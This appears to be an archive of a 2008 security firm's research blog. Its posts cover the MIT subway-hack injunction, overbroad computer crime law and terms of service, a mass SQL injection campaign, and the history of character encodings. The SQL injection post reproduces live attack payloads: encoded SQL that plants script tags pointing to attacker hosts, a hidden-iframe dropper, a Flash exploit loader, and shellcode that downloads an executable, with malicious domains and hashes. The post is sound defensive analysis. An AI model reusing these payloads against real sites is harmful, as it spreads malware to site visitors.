Research

Author Archives

Is Security Research Protected Speech? UPDATE

Tuesday, August 19th, 2008

UPDATE: The Boston Herald is now reporting that in today’s hearing (8/19/08), Judge O’Toole rejected the MBTA’s request to impose a five-month injunction. The temporary restraining order expired earlier today. The MIT students are no longer subject to any judicial orders restraining them from speaking about their research.

Is Security Research Protected Speech?

Tuesday, August 19th, 2008

On Thursday, August 14th, 2008, there was another hearing in the dispute between the group of MIT students and the Massachusetts Bay Transportation Authority (MBTA). Judge O’Toole decided to let the temporary restraining order stand without modification. That order prevents the students from giving their presentation, titled “Anatomy of a Subway Hack,” or discussing related information. The next hearing will be on Tuesday, when the temporary restraining order expires. It seems likely that the MBTA will then ask for a more permanent injunction.

During the emergency hearing on Saturday, August 9th, the Electronic Frontier Foundation (EFF), which is providing counsel for the students, argued that a temporary restraining order of this kind imposed a prior restraint upon their speech. A party seeking prior restraint of another’s speech bears a very high burden to prove that it is not unduly burdening the other party’s freedom of speech. The most famous case involving prior restraint is New York Times Co. v. United States, better known as the Pentagon Papers case. In this case the Supreme Court found that the Government’s interest in restricting the publication of classified material was not sufficient to trump the New York Times’s 1st Amendment rights. The material in question described the Government’s actions in Vietnam, while American soldiers were still fighting in the region. Subsequently the courts have stated that only the most important of government needs, such as preventing the disclosure of the location of our troops in the field, would allow prior restraint. It would not seem that the possible harm of informing people how to get a free ride on the subway would rise to that level.

How is it then that the MBTA was able to obtain a temporary restraining order preventing the students from speaking? Judge Woodlock, the judge who presided over the emergency hearing on August 9th, interpreted the Computer Fraud and Abuse Act (CFAA) to mean that the students, while giving a talk at Defcon and/or making software available for download, could be in violation of the CFAA. Specifically, he relied on the clause that criminalizes anyone who “knowingly causes the transmission of a program, information, code, or command and as a result of such conduct, intentionally causes damage without authorization, to a protected computer”. The Judge’s interpretation is that the talk constitutes transmitting information and that if, after the talk, any of the attendees then damage the MBTA by bypassing the fare system, this counts as damage.

The EFF, needless to say, disagrees. The EFF argued that in the CFAA transmission means transmitting information to a computer, not a person (otherwise the statute would infringe upon the 1st Amendment; in other paragraphs the statute uses the term “communicate” to refer to giving information to a person). The EFF also argues that the damage must occur as a direct result of the transmission of the information / code. They say that if someone else later commits a crime based upon information you transmitted to them, the link between the action and the damage is too attenuated to be combined into a violation of the statute. It also seems that, according to the EFF, the damage must be to the computer system, or be damages associated with downtime or cleaning up after an incident. There are other provisions of the CFAA that cover stealing information and unauthorized access with intent to defraud. However, they do not seem to apply in this case and are not the provisions the judge relied upon when he granted the temporary restraining order. The CFAA, although a criminal statute, allows people to bring civil action to recover damages incurred from a violation of the statute and to ask the court to enjoin continued violation of the statute.

The free speech issues the EFF raised at the emergency hearing on Saturday, August 9th were not addressed at that time, but the MBTA did mention them in their brief for the August 14th hearing. The MBTA first called the MIT students’ speech an incitement to a crime, and second stated that: “The Individual Defendants’ DEFCON presentation constitutes commercial speech. Commercial speech is any speech that proposes a commercial transaction. As commercial speech advertising illegal activity, it receives no First Amendment protection. Here, the Presentation is full of marketing, and self-promotional statements. It is not a research paper.” [Plaintiff’s Opposition to Cross Motion for Reconsideration of Defendants]

I have not heard a recording of the hearing on the 14th; however, I’m sure the EFF would take the position that the students’ paper was academic research, which is fully protected by the 1st Amendment. The paper was written while the students were attending one of the most prestigious engineering schools in the world. It was written (and turned into a talk) under the guidance of the extremely well known and respected Professor Rivest (the R in RSA), and it was intended to be presented at a computer security conference. The EFF also submitted as evidence a letter from 11 professors and industry professionals detailing the dangers of preventing this kind of research from being made public.

The other interesting aspect of this is that the MIT students provided a confidential vulnerability assessment of the fare system to the MBTA. The students stated that this document contained more detailed and potentially damaging information than they intended to give at their Defcon talk. The MBTA submitted this document as evidence in the court hearing, and in doing so made it part of the public record. The EFF advised the MBTA of the dangers of this, and suggested that they take emergency action to seal the information so as to prevent it from becoming public. It does not appear the MBTA took any action to prevent this from happening.

This raises many questions in my mind. If we were to look at the MIT students’ conduct in the worst possible light, it is that they wanted to provide details of security flaws to a large group of hackers with either the intent that, or reckless disregard for the fact that, some of the attendees would use this information to evade paying fares on the T. The MBTA calls this commercial speech and an incitement to a crime.

According to the MIT students, the MBTA provided substantially the same or more information to the public in the form of a court filing. What is the difference between these two? What makes one actionable under the law and not the other? Is it the substantive information about the security flaws? Is it the location and audience that makes the difference? There was a presentation at Blackhat on the security of the Mifare card (the same card used by the T) that went on without a legal challenge. There was a legal action brought against a university in the Netherlands to attempt to prevent them from publishing similar Mifare research, but a Dutch court ruled in favor of the university.

If the students had presented this same information in an academic journal or at a more academic sounding conference (as opposed to the scary sounding, hacker infested Defcon), would that have been ok? Or was it the provocative language in the students’ presentation? They did use phrases like “Want free subway rides for life?”, “This is illegal - for educational use only” (the judge in the emergency hearing found this phrase to be tongue in cheek and offensive), and “Is this hackable? Yes!”. Or is it motive that makes this speech possibly unprotected? Is the difference that the MIT students wanted to encourage others to break the law and that the MBTA is just trying to educate the court? Can the aforementioned choice of venue, audience, and tone of their speech be seen as sufficient to indicate that their motive is to incite others to violate the law?

I’m not a lawyer, so I can’t speak authoritatively on what speech is protected under the First Amendment. However, it seems that it is the tone of the students’ speech more than the technical content that is causing (or exacerbating) their legal problems. Unfortunately, I’ve found in looking into other cases that when faced with complex questions of technology and law, judges will sometimes fall back on one of the more classical elements of crime - motive.

If the defendant seems to have had malicious intent, then he likely violated a law. For example, in the David Ritz case I blogged about earlier, one of the findings was that, “The Court finds by clear and convincing evidence that Ritz is guilty of actual malice. Sierra is entitled to an award of exemplary damages for the sake of example and by way of punishing Ritz.” Ritz may have harbored malicious intent towards Sierra (Ritz alleges that Sierra is a spam house), but is that the key point that should make his DNS zone transfer unlawful? Is it right to punish one person but not another for obtaining the same publicly available information simply because their motives differed? Likewise, should the MIT students be stopped from sharing their research because of the admittedly juvenile and offensive manner in which it was presented? I don’t think so, but instead of suggesting a way to deal with these questions, I’ll end with a quote from Justice Black’s opinion in the Pentagon Papers case: “The word ‘security’ is a broad, vague generality whose contours should not be invoked to abrogate the fundamental law embodied in the 1st Amendment.” [New York Times Co. v. United States]

SecureWorks follows a responsible disclosure policy when discovering a vulnerability. It can be found at http://www.secureworks.com/research/disclosure.html

False Positives in the Legal System

Wednesday, July 2nd, 2008

Recently Lori Drew was charged with violating the Computer Fraud and Abuse Act for signing up for a MySpace account under a fake name. While the larger circumstances were quite shocking (and have been covered enough that I don’t think I need to go into them), she was charged for nothing more than pretending to be someone else on the Internet. The indictment calls this a felony under Title 18, Section 1030(a)(2)(C) of the US Code, which criminalizes anyone who “intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains information from any protected computer if the conduct involved an interstate or foreign communication.” The access to MySpace was unauthorized because using a fake name violated the terms of service. The information from a “protected computer” was the profiles of other MySpace users.

If this is found to be a valid interpretation of the law, it’s really quite frightening. If you violate the Terms of Service of a website, you can be charged with hacking. That’s an astounding concept. Does this mean that everyone who uses Bugmenot could be prosecuted? Also, this isn’t a minor crime, it’s a felony punishable by up to 5 years imprisonment per count. In Drew’s case she was charged with three counts for accessing MySpace on three different occasions.

This isn’t the first time that there’s been a controversial ruling based on these laws. Earlier this year David Ritz was fined over $50,000 in civil proceedings under a similar state statute in Sierra Corporate Design, Inc. v. David Ritz.

Ritz looked at DNS records in an attempt to get more information about a company he alleges was spamming. He used a zone transfer to retrieve all of the records on the Plaintiff’s DNS server. The judge found that “Ritz’s behavior in conducting a zone transfer was unauthorized within the meaning of the North Dakota Computer Crime Law.” The Plaintiff in the case argued that because a zone transfer was an obscure command, and because it was intended only for use by DNS administrators, it was unauthorized access, and that the information he obtained was not publicly available. This was found to be true even though the Plaintiff’s DNS server would happily hand out that information to whoever asked. I personally, along with many other security and network professionals, consider this a legitimate use of a publicly available service. It may not be in the best interest of the Plaintiff to make this information public, but that doesn’t mean that Ritz should incur legal liability for accessing (or using) it.

The problem is that there is no generally accepted definition of what unauthorized means in this context. Lawmakers either didn’t define the term or, if they did, used such sweeping language that the definition is plainly overbroad. One Kansas statute defined access as “to approach, instruct, communicate with, store data in, retrieve data from, or otherwise make use of any resources of a computer.” A judge rejected that definition, saying that if it was used, then “any unauthorized physical proximity to a computer could constitute a crime” and instead used the definition of access from Webster’s dictionary.

Such overarching language is also common in the terms of service (TOS) used by ISPs and websites to define what is allowed to happen on their website or service. These documents are written by lawyers trying to shield their employers / clients from harm, not to establish a usable set of rules of conduct. As such they are routinely ignored by both service providers and visitors. Commonly they contain clauses that no reasonable person could be expected to abide by. One example is a TOS that expects users to not “violate any local, state, federal, or non-U.S. law, order, or regulation.” In conjunction with the CFAA, wouldn’t this make violating any law from any country a violation of US law? Another clause commonly found in a TOS prohibits any content which is “threatening, abusive, defamatory, invasive of privacy or publicity rights, vulgar, obscene, profane or otherwise objectionable.” This type of clause seems to be intended to prohibit being mean on the Internet. The ironic thing is that it’s not uncommon to find a TOS which prohibits the majority of the content on the web site, for example a celebrity gossip site forbidding the posting of sensitive information.

The discrepancy between the TOS and the actual use of a website has had negative consequences. In March, New Jersey Attorney General Anne Milgram subpoenaed the website juicycampus.com. Milgram felt that it was a possible violation of the Consumer Fraud Act for the website to disallow offensive content in its TOS, but to not actively remove offensive content. Juicycampus.com is a gossip site, which goes out of its way to solicit, well, juicy gossip about college life. The website uses slogans like “Always Anonymous. Always Juicy,” so it sure looks like the website is going out of its way to solicit offensive content. Why does it say that such content is disallowed in its TOS? In Ritz’s case one of the findings of law was that “Ritz has engaged in a variety of activities without authorization on the Internet. Those activities include … the compilation and publication of Whois lookups without authorization from Network Solutions.”

Whois data is intended to be used to identify the owners of a domain and communicate that information to others. However, the TOS states that the “compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of Network Solutions.” This portion of the TOS clearly contradicts the intended use of the data, so why is it there?

I think it’s because the lawyers who wrote it wanted the most leverage possible if and when they felt it necessary to take legal action against someone using the data in a way they didn’t like. Unfortunately, this overly restrictive TOS helped contribute to a $50,000 judgment against Ritz.

From my perspective, as someone who writes IPS signatures, these issues are the result of not paying enough attention to false positives. The dedication to preventing false positives in the American legal system can be seen in Benjamin Franklin’s rephrasing of Blackstone’s formulation: “that it is better [one hundred] guilty Persons should escape than that one innocent Person should suffer.” Defining what constitutes an unauthorized and criminal violation of a computer system is an extremely difficult task, but it is an important enough issue that it deserves an earnest effort. Legislatures may have the advantage that, unlike my IPS signatures, their laws are interpreted by judges, prosecutors and other people who are capable of exercising independent judgment, but that’s no reason to write overly broad laws that criminalize the majority of Internet users. When those laws are so broad as to be unknowingly violated and unenforceable as written, judges should strike them down for vagueness. Website and ISP operators should also not write TOS that they know will be violated by legitimate users of their site. It might be nice if there were a principle of contract law that invalidated Terms of Service which are so overbroad as to be meaningless. However, even if there is no such principle, operators should still write terms that can actually be followed, because words mean something, and contracts and laws should as well.

New Round of Mass SQL Injections

Wednesday, June 4th, 2008

There’s a new round of the Mass SQL injection attacks that have been going on for the past few months. This time it looks like the bad guys are using a slightly different variant of the SQL injection attack and the backend malware dropper pages. In previous iterations the SQL attack looked like this:

;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x44004500
43004C00410052004500200040005400200076006100720063006800
61007200280032003500350029002C00400043002000760061007200
63006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F004300750072007300
6F007200200043005500520053004F005200200046004F0052002000
730065006C00650063007400200061002E006E0061006D0065002C00
62002E006E0061006D0065002000660072006F006D00200073007900
73006F0062006A006500630074007300200061002C00730079007300
63006F006C0075006D006E0073002000620020007700680065007200
6500200061002E00690064003D0062002E0069006400200061006E00
6400200061002E00780074007900700065003D002700750027002000
61006E0064002000280062002E00780074007900700065003D003900
390020006F007200200062002E00780074007900700065003D003300
350020006F007200200062002E00780074007900700065003D003200
3300310020006F007200200062002E00780074007900700065003D00
310036003700290020004F00500045004E0020005400610062006C00
65005F0043007500720073006F007200200046004500540043004800
20004E004500580054002000460052004F004D002000200054006100
62006C0065005F0043007500720073006F007200200049004E005400
4F002000400054002C004000430020005700480049004C0045002800
40004000460045005400430048005F00530054004100540055005300
3D0030002900200042004500470049004E0020006500780065006300
2800270075007000640061007400650020005B0027002B0040005400
2B0027005D00200073006500740020005B0027002B00400043002B00
27005D003D0072007400720069006D00280063006F006E0076006500
72007400280076006100720063006800610072002C005B0027002B00
400043002B0027005D00290029002B00270027003C00730063007200
69007000740020007300720063003D0068007400740070003A002F00
2F007700770077002E006E006900680061006F007200720031002E00
63006F006D002F0031002E006A0073003E003C002F00730063007200
6900700074003E002700270027002900460045005400430048002000
4E004500580054002000460052004F004D0020002000540061006200
6C0065005F0043007500720073006F007200200049004E0054004F00
2000400054002C0040004300200045004E004400200043004C004F00
5300450020005400610062006C0065005F0043007500720073006F00
720020004400450041004C004C004F00430041005400450020005400
610062006C0065005F0043007500720073006F007200
%20AS%20NVARCHAR(4000));EXEC(@S);--
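
To see what a payload like this actually runs, the hex literal inside the CAST can be decoded offline. The following is only a minimal Python sketch, not a tool from this post: the function name decode_cast_literal is made up for illustration, and it assumes NVARCHAR data is UTF-16LE (as on Microsoft SQL Server) and that VARCHAR data can be read as single-byte Latin-1.

```python
def decode_cast_literal(hex_literal: str, sql_type: str = "NVARCHAR") -> str:
    """Decode the 0x... literal from CAST(0x... AS NVARCHAR/VARCHAR) into text."""
    # Remove whitespace introduced by line wrapping, then the leading 0x.
    digits = "".join(hex_literal.split())
    if digits.lower().startswith("0x"):
        digits = digits[2:]
    raw = bytes.fromhex(digits)
    # Assumption: NVARCHAR is UTF-16LE; VARCHAR is treated as Latin-1.
    encoding = "utf-16-le" if sql_type.upper().startswith("N") else "latin-1"
    return raw.decode(encoding, errors="replace")


if __name__ == "__main__":
    # The first 20 bytes of the payload above.
    print(decode_cast_literal("0x4400450043004C00410052004500200040005400"))
```

Feeding it the whole literal (with the line breaks left in) should print the cursor loop that appends the script tag to every text column.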

The new SQL injection looks slightly different. Less of the SQL code is contained within the CAST construct, so the total amount of code is smaller than the previous attack. The attacker did use the ever popular alternating ( aka elite ) caps in what appears to be an attempt to obfuscate the code. Thankfully for all those who write I(D|P)S rules, the good old /i flag will still match it.

;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20
tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20
sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTy
Pe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe
=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next
%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)
%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim
(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C7363726970742
07372633D687474703A2F2F7777772E7869616F6261697368616E2E6E65742
F64742F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr
(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd
%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- HTTP/1.1
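
As a rough illustration of why alternating caps do not help the attacker, here is a small Python sketch of a case-insensitive match. The pattern and the function name looks_like_mass_injection are hypothetical and written only for this example; a production I(D|P)S rule would be more involved.

```python
import re
from urllib.parse import unquote

# Hypothetical pattern for illustration only, not a real signature.
# re.IGNORECASE plays the role of the /i flag.
CURSOR_INJECTION = re.compile(r"declare\s+@\w+\s+n?varchar\(\d+\)", re.IGNORECASE)


def looks_like_mass_injection(request_line: str) -> bool:
    """URL-decode the request, then search case-insensitively for the DECLARE."""
    return CURSOR_INJECTION.search(unquote(request_line)) is not None


if __name__ == "__main__":
    print(looks_like_mass_injection(";dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)"))
    print(looks_like_mass_injection("GET /index.html HTTP/1.1"))
```

The same pattern matches the opening of both the old and the new variant, because the request is URL-decoded first and the comparison ignores case.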

On the other side of the exploit, users who are affected by the embedded script tags will be sent to this JavaScript page:

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("pidupdatessl=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "pidupdatessl=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=hxxp://en-us18.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

That page then opens an invisible IFrame, which injects the code which actually drops the malicious Flash files.

<html>
<body>
<script>
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");
if(Flashver[2] == 115){
        document.write("<embed src=\"advert.swf\"></embed>");
}
if(Flashver[2] == 47){
        document.write("<embed src=\"banner.swf\"></embed>");
        }
</script>
</body>
</html>

That’s much cleaner than some of the previous rounds, which would open up 3 or 4 different IFrames full of malware. Given that the Flash exploit is newer and more universal, I can see why the bad guys would decide to use it exclusively. There are reports that the newest Flash exploit will work on versions up to 115, which seems credible given that the bad guys are testing for that version. Previously the bad guys used a grab bag of ActiveX, RealPlayer and other exploits. I wouldn’t be surprised if that approach led to a lot more crashes. If any of the exploits failed it could cause the browser to crash, and that’s not even considering the possibility that the exploits might step on each other’s toes.

The malicious Flash files look to be based upon Mark Dowd’s Inhuman Flash exploit. The two files seem almost identical; each downloads a root kit, and the file names are very similar (dddd.exe for one, ddd2.exe for the other). The two root kits are the same file, as the matching md5 hashes below show.

00000090  8b 03 c5 c3 75 72 6c 6d  6f 6e 2e 64 6c 6c 00 95  |....urlmon.dll..|
000000a0  bf d0 a7 17 47 e8 aa ff  ff ff 83 ec 04 83 2c 24  |....G.........,$|
000000b0  16 ff d0 95 50 bf e2 e6  58 1b e8 95 ff ff ff 8b  |....P...X.......|
000000c0  54 24 fc 8d 52 0e 33 db  53 53 52 eb 3b 43 3a 5c  |T$..R.3.SSR.;C:\|
000000d0  38 38 38 37 36 2e 65 78  65 00 53 ff d0 5d bf f7  |88876.exe.S..]..|
000000e0  7e be ad e8 6c ff ff ff  83 ec 04 83 2c 24 1b ff  |~...l.......,$..|
000000f0  d0 bf 02 f2 26 8f e8 59  ff ff ff 61 68 55 d6 1a  |....&..Y...ahU..|
00000100  30 83 c4 08 ff 64 24 f8  e8 cd ff ff ff 68 74 74  |0....d$......hxx|
00000110  70 3a 2f 2f 6c 6f 63 61  6c 65 34 38 2e 63 6f 6d  |p://locale48.com|
00000120  2f 61 64 2f 64 64 64 32  2e 65 78 65 00 00 00 00  |/ad/ddd2.exe....|

New Malicious domains:

  • hxxp://o7n9.cn/
  • hxxp://www.redir94.com/b.js
  • hxxp://www.rexec39.com/b.js
  • hxxp://www.locale48.com/b.js
  • hxxp://www.rundll92.com/b.js
  • hxxp://www.libid53.com/b.js
  • hxxp://www.en-us18.com/b.js
  • hxxp://www.script46.com/b.js
  • hxxp://www.xiaobaishan.net/bjs

md5 hashes:

  • a8002df6e691465bc0aad94c7bf86160 advert.swf
  • ac3cb5bdbe3f6ed14cee7e5e94fc83a5 banner.swf
  • 49b13ae1a881132440dd15e50310328f ddd2.exe
  • 49b13ae1a881132440dd15e50310328f dddd.exe

Character Encoding Issues

Tuesday, March 4th, 2008

Recently, Core Security announced a vulnerability in VMware Workstation (Server and ESX are unaffected) that allows a guest operating system to break out of its virtualized environment and interact with the host operating system. They discovered it was possible to break out by using a directory traversal attack on a shared folder, a feature designed to allow data to be passed between the guest operating system(s) and the host operating system. This attack is possible despite attempts to sanitize the path string for dangerous ("..") sequences, because the sanitization routine is called before the path string is normalized using a Microsoft library call that converts characters from UTF-8 to UTF-16. It is better practice to normalize a string before sanitizing it for dangerous characters, but the complexity of character encoding has caused other vulnerabilities in the past.
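
The ordering problem is easy to reproduce in miniature. The Python sketch below is an analogy, not the VMware code: it uses URL percent-decoding in place of the UTF-8 to UTF-16 conversion, and both function names are invented for illustration. The point is only that a check made before the final decoding step can be bypassed by input that turns dangerous after decoding.

```python
from urllib.parse import unquote


def check_then_decode(path: str) -> str:
    """Buggy order: looks for '..' before the string is in its final form."""
    if ".." in path:
        raise ValueError("directory traversal rejected")
    return unquote(path)


def decode_then_check(path: str) -> str:
    """Safer order: decode first, then inspect what will actually be used."""
    decoded = unquote(path)
    # Simplification: only '/' is treated as a path separator here.
    if ".." in decoded.split("/"):
        raise ValueError("directory traversal rejected")
    return decoded


if __name__ == "__main__":
    sneaky = "%2e%2e/%2e%2e/etc/passwd"
    print(check_then_decode(sneaky))   # the check passes, the result is a traversal
    try:
        decode_then_check(sneaky)
    except ValueError as err:
        print("blocked:", err)
```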

Looking into this vulnerability made me curious about the variety of encoding schemes that are in common use today. I had a basic grasp of ASCII, and knew vaguely about Latin-1 and Unicode, but I didn’t know the kind of in-depth details that are needed in the security world. I decided that in order to really understand the issues involved I would have to go back and learn how various encoding standards were used historically and how we got from them to our most current batch of standards.

It all started with that familiar mainstay of the computer world. ASCII, or the American Standard Code for Information Interchange, was first published as an American Standard back in 1963. The standard is only 12 pages long, and the Standard Code itself described only 100 characters in a 7-bit code. The first standard didn’t even include lower case letters. The Standard Code was designed for information interchange between such varied devices as punch card reader/writers, tape (perforated and magnetic) machines, telegraphs and other devices. One device that ASCII was not designed for was the computer monitor. In the 1960s computer time was much too valuable to use just to display information on a screen to a user. In a statement oddly presaging the legendary quote from Bill Gates about 640k of memory, Appendix A of the ASCII-1963 standard states that “A 7-bit set is the minimum size that will meet requirements” … “Both a 6-bit and 8-bit set were considered and rejected” … “the 8-bit because it provides far more characters than are now needed in general applications.” A later version of ASCII would add lower case letters and would also merge the ASCII standard with ISO-646 (also ECMA-6).

Once the CRT revolution swept the computing industry and we moved away from punch cards and teletypes, people found that there was an extra, unused bit in every byte used to record a character. This led to many different custom “extended ASCII” character sets. IBM’s version, used on IBM compatible PCs, was probably the most popular of these. A primary goal of many of these extensions was to provide the accented characters that are used in Latin script based languages other than English.

In order to have a better way to represent a larger number of languages, the ISO developed the ISO-8859 standard. The ISO-8859 standard defines 15 different character sets designed to represent different language groups. Each ISO-8859 character is encoded in one byte, so there are 256 possible characters. The most commonly used of the ISO-8859 family is ISO-8859-1 (also known as ISO-8859-Latin-1, or just Latin-1). The Latin-1 standard is designed for Western European languages. The ISO-8859-1 standard supports the following languages: Afrikaans, Albanian, Breton, Danish, Dutch, English, Estonian, Faroese, French, Finnish, Galician, German, Icelandic, Irish, Italian, Latin, Luxembourgish, Norwegian, Occitan, Portuguese, Rhaeto-Romanic, Scottish Gaelic, Spanish, Swahili, Swedish, Walloon, Welsh and Basque. Other ISO-8859 standards cover other languages, such as ISO-8859-5 for Cyrillic based languages and ISO-8859-8 for the Hebrew language.

In the same way that IBM extended ASCII, the ISO-8859-1 character set consists of the printable ASCII characters in their original positions, plus additional characters that fill the extra space made available by using the 8th bit. The ISO-8859-1 standard was first published in 1985. The ISO-8859 standards allow a large number of languages to be encoded in one family of standards. This allowed much greater interoperability and standardization between speakers of different languages, but there were still some things that could not be done by these standards, such as recording whether a language is written right to left or left to right. There was also the issue of multi-byte sequences used by symbol based languages. There was a desire to have one universal character encoding system. The desire for this universal character encoding system was so great that there ended up being two universal systems.

The ISO’s solution to these problems was the Universal Character Set (UCS), or ISO 10646. This extremely ambitious undertaking planned to create a truly universal character set. With over a million possible characters (earlier drafts had the space for over two million), the goal was to encode every historic, current or future language in one standard. This massive code space is broken up into different planes to simplify things. Almost all commonly used characters inhabit the Basic Multilingual Plane (BMP). But there are other planes for symbol based languages and also a private code space (analogous to RFC 1918 private IP space) that can be used for imaginary languages. There is even an organization, ConScript, devoted to unofficially sharing this space to make sure every imaginary language has unique code points. With over 130,000 code points allocated to private use, there should be plenty of space for languages like J.R.R. Tolkien’s Tengwar and Cirth (better known to all but his most die hard fans as Elvish and Dwarvish), and not just the expected Klingon, but also Ferengi. I think my favorite of the made up languages is Dr. Seuss’ extensions to the Latin character set. What’s not to like about a character called ABCDEFGHIJKLMNOPQRSTUVWXYZ?

In addition to the UCS, there was a second universal encoding scheme known as Unicode. Its goal was merely to encode all modern languages, and it was designed to use a smaller 2 byte (64K) character space. Thankfully the two organizations realized that the world didn’t need more than one universal encoding system and have merged the two. Like any merger of two preexisting projects, this one created some complications, but it’s still probably for the best.

ISO 10646 originally defined two different encoding options for using the UCS. These were UCS-2 and UCS-4, which encode each character in 2 or 4 bytes respectively. UCS-2 can, however, use special escape sequences to address characters outside of the Basic Multilingual Plane. One big problem with the UCS encodings is that most common ASCII characters are encoded with leading NULL bytes. This causes all kinds of issues for Unix operating systems, which traditionally use NULLs to terminate strings.
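
The NULL byte problem is easy to see from a Python prompt. This is only a sketch: it relies on the fact that, for characters in the Basic Multilingual Plane, Python's utf-16-be codec produces the same bytes as big-endian UCS-2 and utf-32-be the same bytes as UCS-4, and c_strlen is a made-up stand-in for the way C code finds the end of a string.

```python
def c_strlen(buf: bytes) -> int:
    """Length as a C-style routine would see it: stop at the first zero byte."""
    end = buf.find(b"\x00")
    return len(buf) if end == -1 else end


text = "cat"
as_ascii = text.encode("ascii")     # b"cat"
as_ucs2 = text.encode("utf-16-be")  # b"\x00c\x00a\x00t"
as_ucs4 = text.encode("utf-32-be")  # three zero bytes before each letter

if __name__ == "__main__":
    for name, buf in (("ASCII", as_ascii), ("UCS-2", as_ucs2), ("UCS-4", as_ucs4)):
        print(name, buf, "C-style length:", c_strlen(buf))
```

Code that treats the first zero byte as the end of the string sees the two and four byte forms of "cat" as empty.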

Unicode was originally designed to be encoded in a simple two-byte format known as UTF-16. However, Unicode decided to address the entire Universal Code Space, so it needed a trick to let UTF-16 reach code points beyond what can be stored in two bytes. That trick is known as surrogate characters.

Surrogate characters are special two-byte values that are used in pairs to indicate a four-byte character. To ensure compatibility between ISO 10646 and Unicode, surrogate code points have been officially reserved in the UCS code space and will not be used for any other purpose. Surrogate characters solved the problem of allowing what was originally a two-byte code to address a much larger code space.
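The surrogate trick can be sketched in Python. The reserved ranges used here (0xD800 to 0xDBFF for the first half of a pair, 0xDC00 to 0xDFFF for the second) are not spelled out above and come from my reading of the UTF-16 definition. The function name is made up for illustration.

```python
# Sketch: split a code point above the BMP into a UTF-16 surrogate pair.
# to_surrogate_pair is a hypothetical helper, not a library function.

def to_surrogate_pair(code_point: int) -> tuple:
    if not 0x10000 <= code_point <= 0x10FFFF:
        raise ValueError("only code points above the BMP need a surrogate pair")
    offset = code_point - 0x10000       # leaves a 20-bit value
    high = 0xD800 + (offset >> 10)      # top 10 bits go in the first surrogate
    low = 0xDC00 + (offset & 0x3FF)     # bottom 10 bits go in the second
    return high, low

high, low = to_surrogate_pair(0x1D11E)  # MUSICAL SYMBOL G CLEF
print(hex(high), hex(low))              # 0xd834 0xdd1e

# Cross-check against Python's own UTF-16 encoder.
print(chr(0x1D11E).encode("utf-16-be").hex())  # d834dd1e
```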

There was another problem with Unicode. A large part of the Unix world was (and still is) based around the concept of one character per byte and binary compatibility with the old ASCII standard. One evening a gentleman named Ken Thompson (whom you may know for such modest innovations as the B programming language and the UNIX operating system) decided to scribble a better encoding standard on a New Jersey diner placemat. This new standard was called UTF-8, a variable-length encoding that preserved the original one-byte encoding of characters from the ASCII set. The entire UCS could be addressed by using up to 6 bytes.
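To make the variable-length idea concrete, here is a minimal hand-rolled UTF-8 encoder in Python. It is a sketch under stated assumptions: it covers only the range up to U+10FFFF (at most 4 bytes), whereas the original design continued the same pattern up to 6 bytes, and it does not reject surrogate code points the way a production encoder would. The function name is hypothetical.

```python
# Sketch: encode one code point as UTF-8 by hand (up to 4 bytes only).
# utf8_encode is a hypothetical helper; it does not reject surrogates.

def utf8_encode(code_point: int) -> bytes:
    if code_point < 0x80:
        # ASCII stays a single, unchanged byte.
        return bytes([code_point])
    if code_point < 0x800:
        return bytes([0xC0 | (code_point >> 6),
                      0x80 | (code_point & 0x3F)])
    if code_point < 0x10000:
        return bytes([0xE0 | (code_point >> 12),
                      0x80 | ((code_point >> 6) & 0x3F),
                      0x80 | (code_point & 0x3F)])
    if code_point <= 0x10FFFF:
        return bytes([0xF0 | (code_point >> 18),
                      0x80 | ((code_point >> 12) & 0x3F),
                      0x80 | ((code_point >> 6) & 0x3F),
                      0x80 | (code_point & 0x3F)])
    raise ValueError("code point out of range for this sketch")

print(utf8_encode(ord("A")))        # b'A'
print(utf8_encode(0x03A3).hex())    # cea3

# Cross-check against Python's built-in encoder.
for ch in ("A", "\u03a3", "\u20ac", chr(0x1D11E)):
    assert utf8_encode(ord(ch)) == ch.encode("utf-8")
```

Note that no byte of a multi-byte sequence is ever below 0x80, so NULL and the rest of ASCII never appear by accident inside another character.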

There is also an encoding called UTF-7, which was designed to allow Unicode characters to be used in places (such as SMTP) that are required to be 7-bit clean. It is not a Unicode or ISO standard, but it did have an RFC devoted to it. Another UTF encoding is UTF-32, which simply uses four bytes to represent each code point, trading space for simplicity.
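Python happens to ship codecs for both of these, which makes for a quick illustration. This is only a sketch using the standard library codec names "utf-7" and "utf-32-be"; the sample character is my own choice.

```python
# Sketch: the same character in UTF-7 and UTF-32 using Python's built-in codecs.
text = "\u03a3"  # GREEK CAPITAL LETTER SIGMA

utf7 = text.encode("utf-7")
utf32 = text.encode("utf-32-be")

print(utf7)                         # only 7-bit bytes appear here
print(all(b < 0x80 for b in utf7))  # True
print(utf32.hex())                  # 000003a3
print(len(utf32))                   # 4
```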

